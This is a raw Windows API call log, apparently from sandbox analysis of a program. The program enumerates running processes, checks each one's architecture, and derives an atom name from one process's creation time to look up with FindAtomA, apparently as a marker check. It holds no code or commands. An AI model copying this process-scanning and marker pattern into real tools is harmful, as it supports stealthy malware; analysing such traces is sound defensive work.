	[0075.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e770, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.803] CloseHandle (hObject=0x224) returned 1
	[0075.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e7c0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.803] CloseHandle (hObject=0x224) returned 1
	[0075.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.803] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.804] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.804] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.804] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.805] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetLastError () returned 0x5
	[0075.806] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.807] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.807] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.807] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.807] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.807] CloseHandle (hObject=0x224) returned 1
	[0075.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.807] CloseHandle (hObject=0x224) returned 1
	[0075.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e798, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.807] CloseHandle (hObject=0x224) returned 1
	[0075.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.934] CloseHandle (hObject=0x224) returned 1
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.934] CloseHandle (hObject=0x224) returned 1
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.934] CloseHandle (hObject=0x224) returned 1
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.934] CloseHandle (hObject=0x224) returned 1
	[0075.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.934] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.935] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.936] CloseHandle (hObject=0x224) returned 1
	[0075.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.937] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.938] CloseHandle (hObject=0x224) returned 1
	[0075.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.939] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.939] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.939] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.939] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.939] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.939] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.939] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.940] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.940] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.940] CloseHandle (hObject=0x224) returned 1
	[0075.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.940] CloseHandle (hObject=0x224) returned 1
	[0075.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.940] CloseHandle (hObject=0x224) returned 1
	[0076.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.024] CloseHandle (hObject=0x224) returned 1
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.024] CloseHandle (hObject=0x224) returned 1
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.024] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
